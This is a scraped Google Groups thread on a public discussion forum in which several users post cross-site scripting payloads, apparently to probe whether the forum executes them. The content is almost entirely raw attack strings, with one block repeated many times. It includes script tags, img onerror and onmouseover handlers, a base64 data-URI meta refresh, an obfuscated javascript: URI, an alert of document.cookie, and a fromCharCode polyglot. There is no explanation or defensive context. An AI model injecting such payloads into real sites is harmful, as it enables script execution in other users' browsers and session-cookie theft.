Re: "><body onload=alert("XSS")>//

805 views
Skip to first unread message

vna.me...@gmail.com

unread,
Apr 9, 2015, 11:30:09 AM4/9/15
to dspl-d...@googlegroups.com, hussain...@gmail.com


Le dimanche 25 janvier 2015 20:47:24 UTC, hussain...@gmail.com a écrit :
<img src="<img src=search"/onerror=alert('Hi')/">
"><img src=x "> "> <script type="text/javascript">// <![CDATA[ alert('SECURITYXSS') // ]]></script> ">
Cross site Scripting by Hussain
click me! lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert(SECURITYXSS)</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
"><img src=x onerror=alert(document.domain)> "><img src=x onerror=prompt(1)> <script>alert('SECURITYXSS')</script> "><h1 onmouseover=prompt(0)>Cross site Scripting by Hussain</h1> <body onload=alert('test1')> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

go.html

vna.me...@gmail.com

unread,
Apr 9, 2015, 11:33:08 AM4/9/15
to dspl-d...@googlegroups.com, hussain...@gmail.com
zb.jpg
Message has been deleted

mosua...@gmail.com

unread,
Mar 12, 2016, 1:46:50 PM3/12/16
to DSPL Discussion Forum, hussain...@gmail.com


在 2015年1月26日星期一 UTC+8上午4:47:24,hussain...@gmail.com写道:

mosua...@gmail.com

unread,
Mar 12, 2016, 1:47:15 PM3/12/16
to DSPL Discussion Forum, hussain...@gmail.com, mosua...@gmail.com


在 2016年3月13日星期日 UTC+8上午2:46:50,mosua...@gmail.com写道:

mosua...@gmail.com

unread,
Mar 12, 2016, 1:49:58 PM3/12/16
to DSPL Discussion Forum, hussain...@gmail.com
a
a.html

pokemonre...@gmail.com

unread,
Jul 31, 2017, 7:41:54 AM7/31/17
to DSPL Discussion Forum, hussain...@gmail.com

pokemonre...@gmail.com

unread,
Jul 31, 2017, 7:42:05 AM7/31/17
to DSPL Discussion Forum, hussain...@gmail.com
alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88, 115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68), 83, 83))RIPT>\">\'><SCRIPT>alert("XSSPOSED")</SCRIPT>
Message has been deleted

buggyb...@gmail.com

unread,
Mar 10, 2018, 4:50:10 PM3/10/18
to DSPL Discussion Forum
'"><img src=x onerror=alert(document.domain)>

buggybo...@gmail.com

unread,
Mar 10, 2018, 4:52:16 PM3/10/18
to DSPL Discussion Forum

test
On Sunday, March 11, 2018 at 12:50:10 AM UTC+3, buggyb...@gmail.com wrote:
'"><img src=x onerror=alert(document.domain)>
Reply all
Reply to author
Forward
0 new messages